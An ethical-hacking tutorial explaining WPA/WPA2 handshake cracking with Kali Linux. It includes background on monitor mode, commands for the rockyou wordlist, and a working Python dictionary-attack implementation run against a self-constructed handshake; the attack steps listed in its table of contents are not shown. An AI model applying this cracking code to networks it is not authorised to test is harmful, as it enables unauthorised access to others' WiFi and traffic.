For anyone who wants to get started on an Ethical Hacking career, one of the topics you will encounter is network hacking.
That covers cracking WiFi passwords (WEP, WPA, WPA2), deauthentication attacks (disconnecting users from a WiFi network), Man-in-the-Middle (MITM) attacks, packet sniffing, and packet analysis.
This post will give you a detailed guide on cracking WPA/WPA2 WiFi passwords using Kali Linux.
Important: In this article I’ll be demonstrating how to crack a password on my WiFi network. Please do not use this method for non-ethical purposes.
Table of Contents
1. Understanding How Networks Operate
2. Managed Mode and Monitor Mode?
3. An Overview of How The Method Works
4. Important Notes
5. Step 1. Put Your Card in Monitor Mode
6. Step 2. Test Your Card For Packet Injection
7. Step 3. Packet Sniffing Using Airodump-ng
8. Step 4. Targeted Packet Sniffing
9. Step 5. Cracking WPA/WPA2 Using a Wordlist
Conclusion
Understanding How Networks Operate
Before looking at how to crack WiFi passwords, you need to understand how a network operates. A network is a set of devices connected by wired (Ethernet, fiber, etc.) or wireless (WiFi, Bluetooth, etc.) links in order to share resources. The resource most of us connect to a network for is the Internet.
On a home network the router, which also acts as the wireless access point, is the device every other device talks to. When a client wants something from the Internet, it sends a request to the router, the router forwards it out to the Internet and relays the reply back. The units of data exchanged between the client and the access point are called packets; on the WiFi link itself they travel inside 802.11 frames, which is what we will be capturing.
Managed Mode and Monitor Mode?
Every device that connects to a network has a Network Interface Card (NIC). For WiFi this is the wireless chipset that sends frames to, and receives frames from, the access point.
By default a wireless NIC runs in managed mode: it associates with one access point and only passes up frames addressed to its own MAC address (plus broadcast and multicast). To crack a WPA or WPA2 network we need to capture the handshake exchanged between the access point and some other client, and none of those frames are addressed to us. So we switch the NIC to monitor mode, in which it passes up every 802.11 frame it hears on the current channel, management frames included, regardless of the destination MAC. Not every adapter and driver supports monitor mode (or packet injection, which the deauthentication step needs), which is why the procedure below tests the card before going further.
Up to this point, I believe you now have the basic knowledge required to get you started with Network hacking. Boot your Kali Linux machine, and we can begin to crack WiFi passwords.
An Overview of How The Method Works
To give you a short and simple overview so you know what's coming up, we will:
1. Set our wireless network adapter in monitor mode so it can listen for packets
2. List all available WiFi networks
3. Target a single WiFi network and capture the four-way handshake: the EAPOL-Key frames exchanged between the router and a client when the client connects (or reconnects after we deauthenticate it). The handshake does not carry the password, nor a hash of it, but it does carry two random nonces and a Message Integrity Code (MIC) that was computed with a key derived from the password and the network name (SSID).
4. We won't be decrypting anything. Instead we take a large list of popular passwords and, for each candidate, repeat the derivation the client performed: PBKDF2 of the candidate and the SSID gives the Pairwise Master Key, the two MAC addresses and the two nonces expand it into the Pairwise Transient Key, and the first 16 bytes of that key are used to recompute the MIC over the captured frame.
5. When the recomputed MIC matches the captured one, we have found the password.
Important Notes
In our tutorial we'll use a popular list of passwords, called rockyou.txt, that ships with Kali Linux (about 14 million entries).
If the password you're trying to crack isn't in the password list, also called a wordlist, then this method cannot recover it: it only ever tests the candidates you give it.
You can check whether the password is in the wordlist by running something like grep -Fx 'yourpassword' /usr/share/wordlists/rockyou.txt (-F treats the pattern literally, -x requires a whole-line match).
Keep in mind that Kali ships the list compressed as /usr/share/wordlists/rockyou.txt.gz, so you'll have to extract it first. To do this you can run:
cd /usr/share/wordlists && sudo gzip -d rockyou.txt.gz
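To make the overview concrete, here is the derivation chain that aircrack-ng runs for every wordlist entry, written out in Python. This is an added example, not code from the original tutorial or from the aircrack-ng project. It assumes WPA2 with CCMP (EAPOL key descriptor version 2, so the MIC is HMAC-SHA1 truncated to 128 bits; original WPA with TKIP uses HMAC-MD5 and a 64-byte PTK instead). Because there is no real capture to load, the script constructs its own handshake message 2 from a known passphrase (the SSID, MAC addresses and nonces are hypothetical values chosen for the example) and then "cracks" it with a tiny inline wordlist, which also shows what happens when the password is not in the list.

```python
"""WPA/WPA2-PSK handshake cracking reduced to its core derivation.

Added example, not code from the original tutorial or from aircrack-ng.
The handshake below is constructed inline so the script runs offline;
in the real procedure airodump-ng captures these values from the air.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).

    This is the slow step and the only place the password enters the chain."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (48 bytes for CCMP: KCK | KEK | TK) from the PMK, both MACs and both nonces."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8) = 81
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 MIC: HMAC-SHA1 over the frame with the MIC field zeroed, first 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(capture: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Recompute the MIC for each candidate; the first one that matches is the passphrase."""
    target_mic = capture["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for line in wordlist:
        candidate = line.rstrip("\r\n")
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = derive_ptk(pmk, capture["ap_mac"], capture["client_mac"],
                         capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), target_mic):
            return candidate
    return None  # password not in the wordlist: this method cannot recover it


def build_capture(passphrase: str, ssid: str = "HomeNet") -> dict:
    """Constructed stand-in for what airodump-ng would capture (hypothetical SSID, MACs, nonces).

    Builds EAPOL-Key message 2 of the four-way handshake and fills in a valid MIC."""
    ap_mac = bytes.fromhex("001122334455")
    client_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    body = (struct.pack(">BHH", 2, 0x010A, 0)        # RSN descriptor; key info = MIC|Pairwise|version 2; key length 0
            + (1).to_bytes(8, "big")                  # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, IV, RSC, ID
            + bytes(16) + struct.pack(">H", 0))       # MIC placeholder, empty key data
    eapol = struct.pack(">BBH", 1, 3, len(body)) + body  # EAPOL version 1, type 3 = EAPOL-Key
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol}


if __name__ == "__main__":
    cap = build_capture("sunshine123")
    # Tiny inline wordlist; for the real thing pass
    # open("/usr/share/wordlists/rockyou.txt", errors="ignore") instead.
    print(crack(cap, ["123456", "password", "sunshine123", "qwerty"]))  # sunshine123
    print(crack(cap, ["123456", "password"]))  # None
```

The `pmk_from_passphrase` step is where all the time goes (4096 HMAC-SHA1 rounds per candidate), and it depends on the SSID, which is why a precomputed table only helps against networks with the same name. Everything after it is cheap, so a wrong candidate is rejected almost for free once its PMK exists. The second call in the usage block is the case the Important Notes warn about: the correct passphrase is not in the list, so the loop finishes without a match.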